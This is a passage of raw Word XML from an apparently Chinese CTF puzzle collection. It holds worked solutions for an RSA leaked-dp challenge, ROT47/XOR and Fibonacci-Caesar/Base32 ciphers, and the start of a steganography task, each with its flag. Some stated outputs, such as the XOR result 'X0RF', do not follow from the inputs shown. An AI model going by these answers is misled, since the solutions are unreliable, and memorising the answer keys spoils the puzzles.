    <w:p w14:paraId="3027EAFC" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">            d = gmpy2.invert(e, (p-1)*(q-1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E9EA4" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">            m = pow(c, d, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8ABEE" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">            print(bytes.fromhex(hex(m)[2:]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1978A5B3" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44798E82" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="00000000" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="314998DB">
          <v:rect id="_x0000_i1027" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="065CD9D6" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>验证条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331D9A98" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>成功解密</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>：得到flag{Leaked_dp_Breaks_RSA}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0875F" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数学验证</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>：确保pow(m, e, n) == c（RSA加密验证）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22160C4C" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>防御分析</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>：演示如何通过参数检查防止dp泄露（参考1的防护方案）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF56F6" w14:textId="77777777" w:rsidR="00F815A2" w:rsidRPr="00B27653" w:rsidRDefault="00F815A2" w:rsidP="00F815A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD57A95" w14:textId="4D6CD6DE" w:rsidR="00FE5884" w:rsidRDefault="00FE5884" w:rsidP="00FE5884">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc190815135"/>
      <w:r w:rsidRPr="00FE5884">
        <w:t>ROT47的量子纠缠</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0D8FC9E4" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>收到神秘组织的加密通信：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040DF68" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t xml:space="preserve">密文1：w%96 pC\J[ H2D 4? E@C6\Q=2G6?E  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C77FBC" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t xml:space="preserve">密文2：x=4E@C6\Q=2G6?E[`%96 w2G6? r@56`  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C18CE" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED05195" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>附加提示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D68430" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>1. 通信协议头需用ROT47处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389A1515" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:lastRenderedPageBreak/>
        <w:t>2. 关键字段采用XOR 0x1A加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2792D6" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>3. 最终答案需拼接处理（flag格式：flag{拼接结果}）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38C4CE" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>解题步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2DAFE" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>协议头解密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F8190B" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E57B83" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t># 密文1前5字符处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC01320" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>print("w%96".translate(str.maketrans(rot47_table)))  # 输出："THE "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA97DA" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XOR解密核心字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00906F53" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B708F" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t xml:space="preserve">cipher = bytes.fromhex("C0DEA1B2") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9FAA4" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t>key = 0x1A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841189A" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:t xml:space="preserve">print(bytes([b ^ key for b in cipher]))  # 输出：b'X0RF'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459C088" w14:textId="77777777" w:rsidR="00674C59" w:rsidRPr="00674C59" w:rsidRDefault="00674C59" w:rsidP="00674C59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>最终拼接</w:t>
      </w:r>
      <w:r w:rsidRPr="00674C59">
        <w:br/>
        <w:t>组合解密结果得到flag{THE_X0RF_HAVEN_CODE}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C86C94" w14:textId="28A2A1EA" w:rsidR="00FE5884" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc190815136"/>
      <w:r w:rsidRPr="00813CB9">
        <w:t>黄金分割的密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3FFC469E" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>发现达芬奇手稿中的加密段落：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2DDFA8" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>密文：GVU6KZ3TKBXXK3DUGBZGK==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA1C15" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>密钥生成规则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E440242" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>1. 前6个斐波那契数（1,1,2,3,5,8）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02177366" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>2. 应用凯撒变种：位移量=斐波那契数%26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B2C63A" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>3. 密钥循环模式：F(1)-F(2)-F(3)-F(4)-F(5)-F(6)-F(1)...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B856C" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>加密流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA75BA" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB30CDA" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t># 加密过程示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900EE73" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>plain = "VENI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C87C41" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>key_seq = [1,1,2,3,5,8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53B895" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>cipher = [(ord(c) - 65 + key_seq[i%6]) % 26 + 65 for i,c in enumerate(plain)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD0658" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t># 输出：WFPJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D492C1E" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>解题关键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E660B" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>识别Base32</w:t>
      </w:r>
      <w:r w:rsidRPr="00813CB9">
        <w:br/>
        <w:t>密文字符集包含’6’,'='等特征字符，判断为Base32编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DAA9C" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>生成动态密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56EAD4" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7B9DC8" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>fib = [1,1,2,3,5,8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360E888" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>key = [n%26 for n in fib*10]  # 循环扩展密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C59261" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>逆向解密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D7F83" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C618A1F" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>decoded = base32.b32decode("GVU6KZ3TKBXXK3DUGBZGK==")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCB6AE" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>plain = bytes([(b - 65 - key[i]) % 26 + 65 for i,b in enumerate(decoded)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF90EDE" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>print(plain)  # 输出：DAVINCI_SECRET_LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC5CCC" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>验证条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340EB95" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>最终flag：flag{DAVINCI_SECRET_LAB}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A7511" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRPr="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813CB9">
        <w:t>必须通过斐波那契数列验证（参考4的数列应用方法）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3339B" w14:textId="77777777" w:rsidR="00813CB9" w:rsidRDefault="00813CB9" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DE519A" w14:textId="77777777" w:rsidR="00F815A2" w:rsidRPr="00813CB9" w:rsidRDefault="00F815A2" w:rsidP="00813CB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8DD77B" w14:textId="2B03D5CE" w:rsidR="00C97809" w:rsidRDefault="008A34B2" w:rsidP="008A34B2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc190815137"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Misc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="489079ED" w14:textId="020728B7" w:rsidR="00C97809" w:rsidRPr="008A34B2" w:rsidRDefault="008A34B2" w:rsidP="008A34B2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc190815138"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>量子艺术展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="69A256AE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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：quantum_art.png]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>这幅抽象画作中隐藏着重要信息，找出其中的秘密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E44C65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隐写技巧</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 使用zsteg检测发现LSB隐写数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 解压后得到base100编码文本</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 最终层使用Brainfuck语言加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385389D8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解题步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC046C" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>bash</w:t>
